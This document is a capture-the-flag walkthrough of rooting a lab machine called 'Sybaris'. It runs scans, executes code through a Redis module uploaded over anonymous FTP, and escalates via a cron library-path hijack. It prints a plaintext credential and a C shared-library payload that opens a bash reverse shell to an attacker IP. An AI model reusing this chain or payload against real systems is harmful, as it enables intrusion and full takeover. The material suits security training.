NMAP SCAN
=====================
# nmap -sC -sV 192.168.57.93
PORT      STATE  SERVICE
21/tcp    open   ftp
22/tcp    open   ssh
80/tcp    open   http
6379/tcp  open   redis

# nmap -sC -sV -p 21,22,80,6379 192.168.57.93
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 19:09 EDT
Nmap scan report for 192.168.57.93
Host is up (0.00037s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0               6 Apr 01  2020 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.57.200
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 21:94:de:d3:69:64:a8:4d:a8:f0:b5:0a:ea:bd:02:ad (RSA)
|   256 67:42:45:19:8b:f5:f9:a5:a4:cf:fb:87:48:a2:66:d0 (ECDSA)
|_  256 f3:e2:29:a3:41:1e:76:1e:b1:b7:46:dc:0b:b9:91:77 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/7.3.22)
| http-robots.txt: 11 disallowed entries 
| /config/ /system/ /themes/ /vendor/ /cache/ 
| /changelog.txt /composer.json /composer.lock /composer.phar /search/ 
|_/admin/
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-generator: HTMLy v2.7.5
|_http-title: Sybaris - Just another HTMLy blog
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.22
6379/tcp open  redis   Redis key-value store 5.0.9
MAC Address: 00:50:56:BF:36:E1 (VMware)

Am excited to see what ftp service has to offer.

Directory Scan
=====================
# gobuster dir -u http://192.168.57.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,txt,html -q
http://192.168.57.93/index                (Status: 200) [Size: 7870]
http://192.168.57.93/login                (Status: 200) [Size: 3046]
http://192.168.57.93/content              (Status: 301) [Size: 237] [--> http://192.168.57.93/content/]
http://192.168.57.93/themes               (Status: 301) [Size: 236] [--> http://192.168.57.93/themes/] 
http://192.168.57.93/admin                (Status: 302) [Size: 0] [--> /login]                         
http://192.168.57.93/Index                (Status: 200) [Size: 7870]                                   
http://192.168.57.93/system               (Status: 301) [Size: 236] [--> http://192.168.57.93/system/] 
http://192.168.57.93/front                (Status: 301) [Size: 0] [--> /]                              
http://192.168.57.93/cache                (Status: 301) [Size: 235] [--> http://192.168.57.93/cache/]  
http://192.168.57.93/lang                 (Status: 301) [Size: 234] [--> http://192.168.57.93/lang/]   
http://192.168.57.93/logout               (Status: 302) [Size: 0] [--> /login]                         
http://192.168.57.93/config               (Status: 403) [Size: 208]                                    
http://192.168.57.93/INDEX

After testing the website does not yield much.

Redis port exploration
=====================
The setup instructions here: https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
Then I proceed to upload the module.so via ftp to the writeable pub directory.
Next is to install redis-tools and proceed as below
# redis-cli -h 192.168.51.93 
192.168.51.93:6379> MODULE LOAD /var/ftp/pub/module.so
OK
192.168.51.93:6379> system.exec "id"


192.168.51.93:6379> system.exec "cat /var/www/html/config/users/pablo.ini"
n/praV\x01password = PostureAlienateArson345\nrole = admin\n"
[pablo@sybaris ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
MAILTO=""

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
  *  *  *  *  * root       /usr/bin/log-sweeper
  $ /usr/bin/log-sweeper
/usr/bin/log-sweeper: error while loading shared libraries: utils.so: cannot open shared object file: No such file or directory

  $ find / -type d -writable 2>/dev/null
/usr/local/lib/dev

An example c reverse shell
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
  setgid(0);
  setuid(0);
  system("bash -i >& /dev/tcp/192.168.51.200/6379 0>&1");
}

Compile the reverse shell:
[pablo@sybaris dev]$ gcc -shared -fPIC -nostartfiles pwn.c -o utils.so
[pablo@sybaris dev]$ ls
pwn.c  utils.so

Setup a netcat listener and after a minute I get a reverse shell back
# nc -lvnp 6379
listening on [any] 6379 ...
connect to [192.168.51.200] from (UNKNOWN) [192.168.51.93] 55108
bash: no job control in this shell
[root@sybaris ~]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@sybaris ~]# cd /root
cd /root
[root@sybaris ~]# ls
ls
proof.txt

The box is rooted!


